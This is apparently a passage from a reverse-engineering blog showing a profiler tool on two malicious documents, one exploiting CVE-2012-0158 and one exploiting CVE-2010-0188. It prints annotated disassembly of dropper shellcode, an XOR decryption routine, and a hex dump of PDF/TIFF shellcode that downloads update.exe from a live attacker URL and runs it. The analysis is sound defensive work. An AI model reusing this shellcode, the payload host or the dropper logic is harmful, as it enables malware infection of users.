00001000: mov ebp, esp ; init 00001002: sub esp, 0x280 00001008: mov dword ptr [ebp-0x44], 0x27a3b 0000100F: mov dword ptr [ebp-0x50], 0x1c400 00001016: mov dword ptr [ebp-0x5c], 0x8e00 0000101D: jmp 0x12c1 00001022: pop ebx ; ebx = address of DATA 00001023: mov dword ptr [ebp-0x4c], ebx 00001026: call 0x1250 ; retrieves base of kernel32.dll 0000102B: mov dword ptr [ebp], eax 0000102E: mov ebx, eax 00001030: push ebx 00001031: push 0x5b8aca33 00001036: call 0x1269 ; retrieves address of GetTempPathA 0000103B: mov dword ptr [ebp-0x4], eax 0000103E: push ebx 0000103F: push 0xbfc7034f 00001044: call 0x1269 ; retrieves address of SetCurrentDirectoryA 00001049: mov dword ptr [ebp-0x8], eax 0000104C: push ebx 0000104D: push 0x7c0017a5 00001052: call 0x1269 ; retrieves address of CreateFileA 00001057: mov dword ptr [ebp-0x38], eax 0000105A: push ebx 0000105B: push 0xdf7d9bad 00001060: call 0x1269 ; retrieves address of GetFileSize 00001065: mov dword ptr [ebp-0x10], eax 00001068: push ebx 00001069: push 0x76da08ac 0000106E: call 0x1269 ; retrieves address of SetFilePointer 00001073: mov dword ptr [ebp-0x14], eax 00001076: push ebx 00001077: push 0x10fa6516 0000107C: call 0x1269 ; retrieves address of ReadFile 00001081: mov dword ptr [ebp-0x18], eax 00001084: push ebx 00001085: push 0xe80a791f 0000108A: call 0x1269 ; retrieves address of WriteFile 0000108F: mov dword ptr [ebp-0x1c], eax 00001092: push ebx 00001093: push 0xffd97fb 00001098: call 0x1269 ; retrieves address of CloseHandle 0000109D: mov dword ptr [ebp-0x20], eax 000010A0: push ebx 000010A1: push 0xc0397ec 000010A6: call 0x1269 ; retrieves address of GlobalAlloc 000010AB: mov dword ptr [ebp-0x24], eax 000010AE: push ebx 000010AF: push 0x45b06d76 000010B4: call 0x1269 ; retrieves address of GetModuleFileNameA 000010B9: mov dword ptr [ebp-0x28], eax 000010BC: push ebx 000010BD: push 0x7cb922f6 000010C2: call 0x1269 ; retrieves address of GlobalFree 000010C7: mov dword ptr [ebp-0x2c], eax 000010CA: push ebx 000010CB: push 0x73e2d87e 000010D0: call 0x1269 ; retrieves address of ExitProcess 000010D5: mov dword ptr [ebp-0x30], eax 000010D8: push ebx 000010D9: push 0xe8afe98 000010DE: call 0x1269 ; retrieves address of WinExec 000010E3: mov dword ptr [ebp-0x34], eax 000010E6: push ebx 000010E7: push 0x78b5b983 000010EC: call 0x1269 ; retrieves address of TerminateProcess 000010F1: mov dword ptr [ebp-0x84], eax 000010F7: and dword ptr [ebp-0x48], 0x100 000010FE: add dword ptr [ebp-0x48], 0x4 ; increment handle 00001102: push 0x0 00001104: push dword ptr [ebp-0x48] 00001107: call dword ptr [ebp-0x10] ; GetFileSize 0000110A: cmp eax, dword ptr [ebp-0x44] ; compares with 0x27A3B -> 162363 own file size 0000110D: jnz 0x10fe ; repeat loop if it doesn't match 0000110F: push 0x0 ; dwMoveMethod = FILE_BEGIN 00001111: push 0x0 ; lpDistanceToMoveHigh 00001113: push 0x283b ; lDistanceToMove 00001118: push dword ptr [ebp-0x48] ; hFile 0000111B: call dword ptr [ebp-0x14] ; SetFilePointer 0000111E: push 0x636f64 00001123: push 0x2e726f57 ; pushes the string Wor.doc on the stack 00001128: mov dword ptr [ebp-0x68], esp ; saves string location 0000112B: lea ebx, ptr [ebp-0x100] 00001131: push ebx ; lpBuffer 00001132: push 0x100 ; nBufferLength 00001137: call dword ptr [ebp-0x4] ; GetTempPathA 0000113A: push ebx ; lpPathName 0000113B: call dword ptr [ebp-0x8] ; SetCurrentDirectory 0000113E: push 0x0 ; hTemplateFile 00001140: push 0x6 ; dwFlagsAndAttributes = SYSTEM | HIDDEN 00001142: push 0x2 ; dwCreationDisposition 00001144: push 0x0 ; lpSecurityAttributes 00001146: push 0x3 ; dwShareMode 00001148: push 0x40000000 ; dwDesiredAccess 0000114D: push dword ptr [ebp-0x4c] ; lpFileName = WORD.exe (from DATA) 00001150: call dword ptr [ebp-0x38] ; CreateFileA 00001153: mov dword ptr [ebp-0x54], eax ; file handle 00001156: mov eax, dword ptr [ebp-0x50] ; eax = 0x1c400 00001159: cmp eax, dword ptr [ebp-0x5c] ; compare with 0x8e00 0000115C: jnbe 0x1161 ; allocate the biggest size: eax = max(0x1c400, 0x8e00) 0000115E: mov eax, dword ptr [ebp-0x5c] 00001161: push eax ; dwBytes 00001162: push 0x40 ; uFlags = GMEM_ZEROINIT 00001164: call dword ptr [ebp-0x24] ; GlobalAlloc 00001167: mov dword ptr [ebp-0x60], eax ; allocated memory 0000116A: xchg esi, eax 0000116B: push 0x0 ; lpOverlapped 0000116D: lea edx, ptr [ebp-0x64] 00001170: push edx ; lpNumberOfBytesRead 00001171: push dword ptr [ebp-0x50] ; nNumberOfBytesToRead = 0x1c400 00001174: push esi ; lpBuffer = allocated memory 00001175: push dword ptr [ebp-0x48] ; hFile 00001178: call dword ptr [ebp-0x18] ; ReadFile 0000117B: mov ecx, dword ptr [ebp-0x50] ; ecx = size 0000117E: call 0x123d ; decrypts executable 00001183: push 0x0 ; lpOverlapped 00001185: lea edx, ptr [ebp-0x64] 00001188: push edx ; lpNumberOfBytesWritten 00001189: push dword ptr [ebp-0x50] ; nNumberOfBytesToWrite 0000118C: push esi ; lpBuffer 0000118D: push dword ptr [ebp-0x54] ; hFile 00001190: call dword ptr [ebp-0x1c] ; WriteFile 00001193: push dword ptr [ebp-0x54] ; hObject 00001196: call dword ptr [ebp-0x20] ; CloseHandle 00001199: push 0x0 ; uCmdShow 0000119B: push dword ptr [ebp-0x4c] ; lpCmdLine = WORD.exe 0000119E: call dword ptr [ebp-0x34] ; WinExec 000011A1: push 0x0 ; dwMoveMethod = FILE_BEGIN 000011A3: push 0x0 ; lpDistanceToMoveHigh 000011A5: push 0x1ec3b ; lDistanceToMove 000011AA: push dword ptr [ebp-0x48] ; hFile = own file handle 000011AD: call dword ptr [ebp-0x14] ; SetFilePointer 000011B0: push 0x0 ; hTemplateFile 000011B2: push 0x80 ; dwFlagsAndAttributes 000011B7: push 0x2 ; dwCreationDisposition 000011B9: push 0x0 ; lpSecurityAttributes 000011BB: push 0x0 ; dwShareMode 000011BD: push 0x40000000 ; dwDesiredAccess 000011C2: push dword ptr [ebp-0x68] ; lpFileName = Wor.doc 000011C5: call dword ptr [ebp-0x38] ; CreateFileA 000011C8: mov dword ptr [ebp-0x54], eax ; new file handle 000011CB: push 0x0 ; lpOverlapped 000011CD: lea edx, ptr [ebp-0x64] 000011D0: push edx ; lpNumberOfBytesRead 000011D1: push dword ptr [ebp-0x5c] ; nNumberOfBytesToRead = 0x8e00 000011D4: push dword ptr [ebp-0x60] ; lpBuffer = allocated memory 000011D7: push dword ptr [ebp-0x48] ; hFile 000011DA: call dword ptr [ebp-0x18] ; ReadFile 000011DD: mov esi, dword ptr [ebp-0x60] 000011E0: mov ecx, dword ptr [ebp-0x5c] ; ecx = 0x8e00 000011E3: call 0x123d ; decrypts doc 000011E8: mov esi, dword ptr [ebp-0x60] 000011EB: push 0x0 ; lpOverlapped 000011ED: lea edx, ptr [ebp-0x64] 000011F0: push edx ; lpNumberOfBytesWritten 000011F1: push dword ptr [ebp-0x5c] ; nNumberOfBytesToWrite 000011F4: push esi ; lpBuffer 000011F5: push dword ptr [ebp-0x54] ; hFile 000011F8: call dword ptr [ebp-0x1c] ; WriteFile 000011FB: push dword ptr [ebp-0x54] ; hObject 000011FE: call dword ptr [ebp-0x20] ; CloseHandle 00001201: push dword ptr [ebp-0x48] ; hObject 00001204: call dword ptr [ebp-0x20] ; CloseHandle 00001207: push 0x100 ; nSize 0000120C: lea ebx, ptr [ebp-0x100] 00001212: push ebx ; lpFilename 00001213: push 0x0 ; hModule 00001215: call dword ptr [ebp-0x28] ; GetModuleFileNameA 00001218: mov esi, ebx ; strlen 0000121A: inc esi 0000121B: cmp byte ptr [esi], 0x0 0000121E: jnz 0x121a 00001220: mov edi, esi 00001222: mov byte ptr [edi], 0x20 ; appends ' ' 00001225: inc edi 00001226: mov esi, dword ptr [ebp-0x68] ; appends Wor.doc 00001229: mov ecx, 0x16 0000122E: rep movsd dword ptr [edi], dword ptr [esi] 00001230: push 0x5 ; uCmdShow 00001232: push ebx ; lpCmdLine = current exe name + " Wor.doc" 00001233: call dword ptr [ebp-0x34] ; WinExec 00001236: xor eax, eax 00001238: push eax ; uExitCode 00001239: call dword ptr [ebp-0x30] ; ExitProcess ; decrypts payload 0000123D: pushad 0000123E: mov edi, esi 00001240: lodsb byte ptr [esi] 00001241: cmp al, 0x0 00001243: jz 0x124b 00001245: cmp al, 0xfc 00001247: jz 0x124b 00001249: xor al, 0xfc 0000124B: stosb byte ptr [edi] 0000124C: loop 0x1240 0000124E: popad 0000124F: ret ; retrieves base of kernel32.dll 00001250: push esi 00001251: mov ebx, dword ptr fs:[0x30] 00001258: mov ebx, dword ptr [ebx+0xc] 0000125B: mov ebx, dword ptr [ebx+0x14] 0000125E: mov ebx, dword ptr [ebx] 00001260: mov ebx, dword ptr [ebx] 00001262: mov eax, dword ptr [ebx+0x10] 00001265: pop esi 00001266: ret 0x4 ; retrieves address of API 00001269: push ebx 0000126A: push ebp 0000126B: push esi 0000126C: push edi 0000126D: mov ebp, dword ptr [esp+0x18] 00001271: mov eax, dword ptr [ebp+0x3c] 00001274: mov edx, dword ptr [ebp+eax*1+0x78] 00001278: add edx, ebp 0000127A: mov ecx, dword ptr [edx+0x18] 0000127D: mov ebx, dword ptr [edx+0x20] 00001280: add ebx, ebp 00001282: jecxz 0x12b6 00001284: dec ecx 00001285: mov esi, dword ptr [ebx+ecx*4] 00001288: add esi, ebp 0000128A: xor edi, edi 0000128C: cld 0000128D: xor eax, eax 0000128F: lodsb byte ptr [esi] 00001290: cmp al, ah 00001292: jz 0x129b 00001294: ror edi, 0xd 00001297: add edi, eax 00001299: jmp 0x128d 0000129B: cmp edi, dword ptr [esp+0x14] 0000129F: jnz 0x1282 000012A1: mov ebx, dword ptr [edx+0x24] 000012A4: add ebx, ebp 000012A6: mov cx, word ptr [ebx+ecx*2] 000012AA: mov ebx, dword ptr [edx+0x1c] 000012AD: add ebx, ebp 000012AF: mov eax, dword ptr [ebx+ecx*4] 000012B2: add eax, ebp 000012B4: jmp 0x12b8 000012B6: xor eax, eax 000012B8: mov edx, ebp 000012BA: pop edi 000012BB: pop esi 000012BC: pop ebp 000012BD: pop ebx 000012BE: ret 0x8 000012C1: call 0x1022 ; ; DATA ; Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F Ascii 000002C0 57 4F 52 44 2E 65 78 65 00 00 WORD.exe.. 000002D0 00 00 00 00 00 00 00 00 00 00 ..........

The debugger was necessary only to check which APIs are retrieved by the shellcode and from there static analysis was easy. To sum up the shellcode decrypts two files, an executable and a doc file, executes the first directly and opens the second with the same program which is executing the shellcode.

From the shellcode we can retrieve the ranges of the encrypted payloads:

offset: 0x283b size: 0x1c400 offset: 0x1ec3b size: 0x8e00

Now we can open the encrypted payloads and apply the simple decryption code.

from Pro.UI import proContext, ProView view = proContext().getCurrentView() if view.isValid() and view.type() == ProView.Type_Hex: b = view.readBytes(0, view.getSize()) for x in range(len(b)): if b[x] != 0 and b[x] != 0xFC: b[x] = b[x] ^ 0xFC view.setBytes(b)

We save the decrypted payloads to disk. In the near future this won’t be necessary as such a filter will be easily created and used to load files inside the workspace of the Profiler itself.

We can use the safe text preview of Word Documents in the Profiler to view the text of the document opened by the shellcode.

From the text it seems to be directed at something gov: “My Esteemed Colleagues; Members of the Board of Governors of the Indian Business Chamber in Vietnam”.

The reason for opening the second document is clearly that the instance of the original program which ran the shellcode would’ve crashed and was therefore terminated cleanly with ExitProcess by the shellcode itself. Spawning a second instance with a clean document doesn’t make the user suspicious, from his point of view he just opened a document and a document has indeed been opened.

The executable is not protected by any means and so it’s just a matter of opening it with IDA Pro and spend a few hours understanding the whole code. But that’s beyond the scope of this demonstration.
Author Erik PistelliPosted on May 23, 2013April 1, 2021Categories Suite StandardTags CVE-2012-0158, OLELeave a comment on CVE-2012-0158: RTF/OLE/CFBF/PE

CVE-2010-0188: PDF/Form/TIFF

Given the good reception of the last post, I’ve decided to dedicate more time posting use cases for the Profiler. Today we’re going to analyze a PDF exploiting CVE-2010-0188. Quite old as the name can tell, but it doesn’t really matter for the sake of the demonstration. There’s no real criteria why I picked this one in particular, I just downloaded a pack of malicious PDFs from contagiodump.blogspot.com.

Opening the Zip archive with the Profiler, I chose a random PDF. It is flagged as risky by the Profiler, because it contains an interactive form. If we take a look at the embedded form it’s easy to recognize an embedded image in it which basically represents the whole data of the form. Let’s load this image as an embedded file:

We need to specify the ‘convert/from_base64‘ filter in order to load the actual data. The content of the image is quite obvious. Lots of repetitive bytes, some suspicious strings and some bytes with higher entropy which a trained eye can easily spot as being x86 instructions.

Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F Ascii 00000000 4D 4D 00 2A 00 00 20 38 0C 90 0C 90 0C 90 0C 90 MM.*...8........ 00000010 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 00000020 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 00000030 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 00000040 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 00000050 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 00000060 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 00000070 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 00000080 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 00000090 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 000000A0 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 000000B0 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 000000C0 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 000000D0 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 000000E0 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 000000F0 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 00000100 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 00000110 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 00000120 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 0C 90 ................ 00000130 0C 90 0C 90 EB 46 5F 31 C9 83 E9 01 89 FE 30 C0 .....F_1......0. 00000140 2C 01 F2 AE FE 47 FF 89 FB 30 C0 2C 01 F2 AE FE ,....G...0.,.... 00000150 47 FF 89 FD F2 AE FE 47 FF EB 71 60 31 C9 64 8B G......G..q1.d. 00000160 71 30 8B 76 0C 8B 76 1C 8B 5E 08 8B 56 20 8B 36 q0.v..v..^..V..6 00000170 66 39 4A 18 75 F2 89 5C 24 1C 61 C3 EB 5B 60 8B f9J.u..$.a..[. 00000180 6C 24 24 8B 45 3C 8B 54 05 78 01 EA 8B 4A 18 8B l$$.E<.T.x...J.. 00000190 5A 20 01 EB E3 34 49 8B 34 8B 01 EE 31 FF 31 C0 Z....4I.4...1.1. 000001A0 FC AC 84 C0 74 07 C1 CF 12 01 C7 EB F4 3B 7C 24 ....t........;|$ 000001B0 28 75 E1 8B 5A 24 01 EB 66 8B 0C 4B 8B 5A 1C 01 (u..Z$..f..K.Z.. 000001C0 EB 8B 04 8B 01 E8 89 44 24 1C 61 C3 EB 54 31 D2 .......D$.a..T1. 000001D0 52 52 53 55 52 FF D0 EB 1A EB 5D E8 7B FF FF FF RRSUR.....].{... 000001E0 BA E7 BA 8B C4 52 50 E8 92 FF FF FF 31 D2 52 FF .....RP.....1.R. 000001F0 D0 EB 2D E8 63 FF FF FF BA AA 6E 8A F3 52 50 E8 ..-.c.....n..RP. 00000200 7A FF FF FF 31 D2 83 C2 FF 83 EA FA 52 53 FF D0 z...1.......RS.. 00000210 EB C9 BA 47 7D C8 A0 52 50 E8 60 FF FF FF EB AE ...G}..RP.`..... 00000220 EB 5D E8 34 FF FF FF BA 12 CE 1A 09 52 50 E8 4B .].4........RP.K 00000230 FF FF FF 56 FF D0 EB DA E8 F9 FE FF FF 75 72 6C ...V.........url 00000240 6D 6F 6E 2E 64 6C 6C FF 2E 2E 2F 75 70 64 61 74 mon.dll.../updat 00000250 65 2E 65 78 65 FF 68 74 74 70 3A 2F 2F 76 69 63 e.exe.http://vic 00000260 74 6F 72 6E 69 67 6C 69 6F 2E 69 6E 66 6F 2F 34 torniglio.info/4 00000270 33 68 62 74 72 2F 64 6F 77 6E 6C 6F 61 64 5F 66 3hbtr/download_f 00000280 69 6C 65 2E 70 68 70 3F 65 3D 41 64 6F 62 65 2D ile.php?e=Adobe- 00000290 39 30 2D 32 30 31 30 2D 30 31 38 38 FF CD 03 3E 90-2010-0188...> 000002A0 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E >>>>>>>>>>>>>>>> 000002B0 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E >>>>>>>>>>>>>>>> more brackets...

The repetition of the 0x0C 0x90 sequence is easily identifiable as a slide for the shellcode that follows:

00001000: or al, 0x90 00001002: or al, 0x90 00001004: or al, 0x90 00001006: or al, 0x90 ; etc.

Thus, the space after the slide is the start of the actual shellcode. Let’s disassemble it with the Profiler:

In order to quickly analyze the shellcode we can debug it. We select the portion from 0x134 to 0x29E, press Ctrl+R and run the action ‘Shellcode to executable‘. If you don’t have this action, update your copy of the Profiler.

What it does is to create a Portable Executable out from the bytes selected in the hex view, so that we can easily debug them with every debugger.

Optionally we can specify an application to automatically open the generated file. In this case, as you can see, I have selected OllyDbg.

Here’s the analysis of the shellcode:

00001000: jmp 0x1048 00001002: pop edi ; edi = start of strings 00001003: xor ecx, ecx 00001005: sub ecx, 0x1 ; ecx = 0xFFFFFFFF 00001008: mov esi, edi ; esi = 0x1108 0000100A: xor al, al 0000100C: sub al, 0x1 ; al = 0xFF 0000100E: repne scasb byte ptr [edi] ; find 0xFF terminator 00001010: inc byte ptr [edi-0x1] ; set to 0 00001013: mov ebx, edi ; repeats for the second string 00001015: xor al, al 00001017: sub al, 0x1 00001019: repne scasb byte ptr [edi] 0000101B: inc byte ptr [edi-0x1] 0000101E: mov ebp, edi ; repeats for the third string 00001020: repne scasb byte ptr [edi] 00001022: inc byte ptr [edi-0x1] ; now the three strings 'urlmon.dll', '../update.exe' and ; 'http://victorniglio.info/43hbtr/download_file.php?e=Adobe-90-2010-0188' ; are 0 terminated 00001025: jmp 0x1098 00001027: pushad ; retrieves the base of kernel32.dll 00001028: xor ecx, ecx 0000102A: mov esi, dword ptr fs:[ecx+0x30] 0000102E: mov esi, dword ptr [esi+0xc] 00001031: mov esi, dword ptr [esi+0x1c] 00001034: mov ebx, dword ptr [esi+0x8] 00001037: mov edx, dword ptr [esi+0x20] 0000103A: mov esi, dword ptr [esi] 0000103C: cmp word ptr [edx+0x18], cx 00001040: jnz 0x1034 00001042: mov dword ptr [esp+0x1c], ebx ; ebx = kernel32.dll base 00001046: popad 00001047: ret 00001048: jmp 0x10a5 0000104A: pushad ; this function retrieves the address of an API 0000104B: mov ebp, dword ptr [esp+0x24] 0000104F: mov eax, dword ptr [ebp+0x3c] 00001052: mov edx, dword ptr [ebp+eax*1+0x78] 00001056: add edx, ebp 00001058: mov ecx, dword ptr [edx+0x18] 0000105B: mov ebx, dword ptr [edx+0x20] 0000105E: add ebx, ebp 00001060: jecxz 0x1096 00001062: dec ecx 00001063: mov esi, dword ptr [ebx+ecx*4] 00001066: add esi, ebp 00001068: xor edi, edi 0000106A: xor eax, eax 0000106C: cld 0000106D: lodsb byte ptr [esi] 0000106E: test al, al 00001070: jz 0x1079 00001072: ror edi, 0x12 00001075: add edi, eax 00001077: jmp 0x106d 00001079: cmp edi, dword ptr [esp+0x28] 0000107D: jnz 0x1060 0000107F: mov ebx, dword ptr [edx+0x24] 00001082: add ebx, ebp 00001084: mov cx, word ptr [ebx+ecx*2] 00001088: mov ebx, dword ptr [edx+0x1c] 0000108B: add ebx, ebp 0000108D: mov eax, dword ptr [ebx+ecx*4] 00001090: add eax, ebp 00001092: mov dword ptr [esp+0x1c], eax ; eax = API address 00001096: popad 00001097: ret 00001098: jmp 0x10ee 0000109A: xor edx, edx 0000109C: push edx ; lpfnCB 0000109D: push edx ; dwReserved 0000109E: push ebx ; szFileName = ../update.exe 0000109F: push ebp ; szURL = http://victorniglio.info/43hbtr/download_file.php?e=Adobe-90-2010-0188 000010A0: push edx ; pCaller 000010A1: call eax ; URLDownloadToFileA 000010A3: jmp 0x10bf 000010A5: jmp 0x1104 000010A7: call 0x1027 ; after the call eax = kernel32.dll base 000010AC: mov edx, 0xc48bbae7 000010B1: push edx 000010B2: push eax 000010B3: call 0x104a ; retrieve address of ExitProcess 000010B8: xor edx, edx 000010BA: push edx 000010BB: call eax ; ExitProcess 000010BD: jmp 0x10ec 000010BF: call 0x1027 ; after the call eax = kernel32.dll base 000010C4: mov edx, 0xf38a6eaa 000010C9: push edx 000010CA: push eax 000010CB: call 0x104a ; retrieve address of WinExec 000010D0: xor edx, edx 000010D2: add edx, 0xffffffff 000010D5: sub edx, 0xfffffffa 000010D8: push edx ; uCmdShow = 5 000010D9: push ebx ; lpCmdLine = ../update.exe 000010DA: call eax ; WinExec 000010DC: jmp 0x10a7 000010DE: mov edx, 0xa0c87d47 000010E3: push edx 000010E4: push eax 000010E5: call 0x104a ; retrieve address of URLDownloadToFileA 000010EA: jmp 0x109a 000010EC: jmp 0x114b ; jumps to int 3 000010EE: call 0x1027 ; after the call eax = kernel32.dll base 000010F3: mov edx, 0x91ace12 000010F8: push edx 000010F9: push eax 000010FA: call 0x104a ; retrieve address of LoadLibraryA 000010FF: push esi ; "urlmon.dll 00001100: call eax ; LoadLibraryA 00001102: jmp 0x10de 00001104: call 0x1002

Very standard code as you can see. It downloads a file with URLDownloadToFileA, executes it with WinExec and quits.

The next time I’ll try to pick out something more recent.
Author Erik PistelliPosted on May 21, 2013April 1, 2021Categories Suite StandardTags CVE-2010-0188, Overflow, ShellcodeLeave a comment on CVE-2010-0188: PDF/Form/TIFF

Posts pagination

Previous page Page 1 … Page 20 Page 21 Page 22 … Page 28 Next page